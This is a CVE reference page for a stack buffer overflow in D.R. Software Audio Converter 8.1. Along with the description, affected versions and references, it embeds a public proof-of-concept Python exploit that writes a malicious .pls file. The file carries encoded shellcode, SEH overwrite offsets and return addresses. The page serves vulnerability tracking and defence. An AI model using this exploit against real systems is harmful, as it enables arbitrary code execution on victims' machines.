CVE-2010-2343
Description
Stack-based buffer overflow in D.R. Software Audio Converter 8.1, 2007, and 8.05 allows remote attackers to execute arbitrary code via a crafted pls playlist file.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Audio Converter 8.1 - Local Stack Buffer Overflow
```python
#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
# Date : 16/05/2010
# Author : Sud0
# Bug found by : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version : 8.1
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for .... \n";
import socket
#shellcode running calc.exe alpha2 encoded basereg edx
shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA"
junk="B" * (4432 - len(shell)) #seh overwritten after 4432 bytes
nseh= "\xEB\x06\xEB\x06" # jmp forward
seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv
align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx
buffer= shell + junk + nseh + seh + "\x90" * 20 + align + "A"* 10000# added some nops after seh
mefile = open('poc.pls','w');
mefile.write(buffer);
mefile.close()
```
Audio Converter 8.1 - Local Stack Buffer Overflow ROP/WPM
Easy CD-DA Recorder - '.pls' Local Buffer Overflow (Metasploit)
Easy CD-DA Recorder 2007 - Local Buffer Overflow (SEH)
Metasploit modules
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| dennisre | audio_converter | 8.1 | |
| dennisre | audio_converter | 8.05 | |
| dennisre | audio_converter | 2007 | |
References
- http://osvdb.org/65256
- http://secunia.com/advisories/40081
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-048-d-r-software-multiple-products/
- http://www.exploit-db.com/exploits/13760
- http://www.exploit-db.com/exploits/13763
- http://www.securityfocus.com/bid/40618
- http://www.securityfocus.com/bid/40631
- http://www.vupen.com/english/advisories/2010/1387
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59206
CWEs
CWE-119